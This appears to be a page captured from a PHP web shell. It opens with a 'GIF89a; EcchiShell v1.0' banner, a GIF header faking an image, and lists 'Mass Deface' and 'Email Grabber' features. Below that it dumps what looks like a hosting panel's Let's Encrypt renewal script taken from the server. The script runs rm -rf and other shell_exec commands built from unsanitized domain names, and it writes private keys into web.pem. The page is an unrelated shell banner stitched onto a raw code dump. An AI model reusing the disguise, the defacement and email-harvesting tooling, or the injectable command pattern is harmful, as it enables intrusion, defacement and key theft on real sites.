GIF89a; EcchiShell v1.0
//scripts/

Mass Deface Email Grabber

"SET NAMES 'utf8'")); $zdbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); } catch (PDOException $e) { exit(); } global $zdbh; global $controller; $vhosts_sql = "SELECT vh_name_vc FROM x_vhosts WHERE vh_deleted_ts IS NOT NULL AND vh_name_vc NOT IN (SELECT vh_name_vc FROM x_vhosts WHERE vh_deleted_ts IS NULL)"; $vhosts = $zdbh->prepare($vhosts_sql); $vhosts->execute(); if ( $vhosts->rowCount() > 0 ) { while($vhosts_rows = $vhosts->fetch()) { $delete_dom = $vhosts_rows['vh_name_vc']; $renewal_conf = "/etc/letsencrypt/renewal/$delete_dom.conf"; if(file_exists($renewal_conf)){ echo $renewal_conf . "\n"; shell_exec("rm -rf /etc/letsencrypt/live/$delete_dom"); shell_exec("rm -rf /etc/letsencrypt/renewal/$delete_dom.conf"); shell_exec("rm -rf /etc/letsencrypt/archive/$delete_dom"); } } } shell_exec("touch /var/log/letsencrypt/sslrenew.log"); shell_exec("/usr/local/letsencrypt/./certbot-auto certificates > /var/log/letsencrypt/sslrenew.log"); $port_check = trim(shell_exec('lsof -i:80 -S | tail -1 | cut -d " " -f1')); if($port_check == "varnishd") { shell_exec('/etc/sentora/panel/bin/setso --set apache_port 80'); shell_exec('/etc/sentora/panel/bin/setso --set sentora_port 80'); shell_exec('mysql --socket="/usr/local/mysql/mysql.sock" -e "Update sentora_core.x_vhosts SET vh_custom_port_in="80";"'); shell_exec('mysql --socket="/usr/local/mysql/mysql.sock" -e "Update sentora_core.x_varnish SET x_varnish="Off",x_isactive="0";"'); shell_exec('/etc/sentora/panel/bin/setso --set apache_changed "true"'); shell_exec('/opt/remi/php56/root/bin/php /etc/sentora/panel/bin/daemon.php'); } function rand_string($length = 32) { $chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"; return substr(str_shuffle($chars),0,$length); } function CheckDomainisPointToserver($DomainURLs){ $ch = curl_init($DomainURLs); curl_setopt($ch, CURLOPT_HEADER, true); // we want headers curl_setopt($ch, CURLOPT_NOBODY, true); // we don't need body curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_TIMEOUT,10); $output = curl_exec($ch); $httpcode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); return $httpcode; } $Server_ip_query = "SELECT so_value_tx FROM x_settings WHERE so_name_vc='server_ip'"; $user_result = $zdbh->prepare($Server_ip_query); $user_result->execute(); if ( $user_result->rowCount() > 0 ) { $rowdata = $user_result->fetch(); $Oviserver_ip = $rowdata['so_value_tx']; } $certificate_list = (shell_exec('grep "Certificate Name" /var/log/letsencrypt/sslrenew.log | awk \'{print $3}\'')); $expiry_date = shell_exec('grep "Expiry Date" /var/log/letsencrypt/sslrenew.log | awk \'{print $6}\''); $date_or_hour = shell_exec('grep "Expiry Date" /var/log/letsencrypt/sslrenew.log | awk \'{print $7}\''); $domains = shell_exec('grep "Domains:" /var/log/letsencrypt/sslrenew.log | awk \'{ print $2 }\''); $certificate_list = array_filter(explode("\n", $certificate_list)); $expiry_date = array_filter(explode("\n", $expiry_date)); $domains = array_filter(explode("\n", $domains)); $i = 0; $renewd_flag = false; foreach($certificate_list as $key => $value) { $htaccess_name = false; $domain_path = shell_exec("grep 'webroot_path' /etc/letsencrypt/renewal/$value.conf | awk -F\"=\" '{ print $2 }' | tr -d \" \" | tr -d \",\" | tr -d \"\n\""); if(file_exists("$domain_path/.htaccess")){ $time = time(); $htaccess_name = ".htaccess_$time"; shell_exec("mv $domain_path/.htaccess $domain_path/$htaccess_name"); } $checkDir = '.ovi-knowns'; if(!is_dir("$domain_path/$checkDir")){ shell_exec("mkdir -p $domain_path/$checkDir"); } $filename = rand_string(); if(!file_exists("$domain_path/$checkDir/$filename")){ shell_exec("touch $domain_path/$checkDir/$filename"); } $domain_name = $domains[$i]; $curl_url = "http://$domain_name/$checkDir/$filename"; $http_code = CheckDomainisPointToserver($curl_url); if(!is_dir("$domain_path/$checkDir")){ shell_exec("rm -f $domain_path/$checkDir/*"); } if($htaccess_name){ shell_exec("mv $domain_path/$htaccess_name $domain_path/.htaccess"); } $domain_pointed = false; if($http_code == 200){ $domain_pointed = true; }else{ $GetRecord = dns_get_record($domain_name, DNS_A); $GetRecordClientIP = $GetRecord[0]['ip']; if ($Oviserver_ip == $GetRecordClientIP){ $domain_pointed = true; } } if($domain_pointed){ echo "\n Cert Name: ".$value."\n"; if(trim($value) != "") { $now = time(); if(!file_exists('/var/log/letsencrypt/renew.log')) { echo "\n Kesav \n"; shell_exec("touch /var/log/letsencrypt/renew.log"); } if (strpos($expiry_date[$i], 'EXPIRED') !== false) { echo "EXPIRED "; shell_exec('/usr/local/letsencrypt/./certbot-auto renew --cert-name '.$value.' >> /var/log/letsencrypt/renew.log '); $hostname_service = trim(shell_exec("whereis hostname | awk {'print $2'}")); $hostname = trim(shell_exec("$hostname_service")); if($hostname == $value) { $web_file = "/etc/letsencrypt/live/".$value."/cert.pem"; if(file_exists($web_file)) { shell_exec("cat /etc/letsencrypt/live/$value/cert.pem /etc/letsencrypt/live/$value/privkey.pem > /etc/letsencrypt/live/$value/web.pem"); $service = trim(shell_exec("whereis service | awk '{print $2}'")); shell_exec("$service lighttpd restart"); } } $renewd_flag = true; } else { $hour_flag=0; $chksslword = "hour"; if(strpos(strtolower($date_or_hour[$i]), strtolower($chksslword)) !== false) $hour_flag=1; echo "Valid ".$expiry_date[$i]."\n"; if( $expiry_date[$i] < 10 || $hour_flag==1 ) { shell_exec("/usr/local/letsencrypt/./certbot-auto renew --cert-name $value >> /var/log/letsencrypt/renew.log"); $hostname_service = trim(shell_exec("whereis hostname | awk {'print $2'}")); $hostname = trim(shell_exec("$hostname_service")); if($hostname == $value) { $web_file = "/etc/letsencrypt/live/".$value."/cert.pem"; if(file_exists($web_file)) { shell_exec("cat /etc/letsencrypt/live/$value/cert.pem /etc/letsencrypt/live/$value/privkey.pem > /etc/letsencrypt/live/$value/web.pem"); $service = trim(shell_exec("whereis service | awk '{print $2}'")); shell_exec("$service lighttpd restart"); } } $renewd_flag = true; } } } } $i++; } if($renewd_flag) { $service = trim(shell_exec("whereis service | awk '{print $2}'")); shell_exec("$service httpd reload"); shell_exec("/usr/local/letsencrypt/./certbot-auto certificates > /var/log/letsencrypt/sslrenew.log"); } shell_exec("/usr/local/letsencrypt/./certbot-auto renew") ?>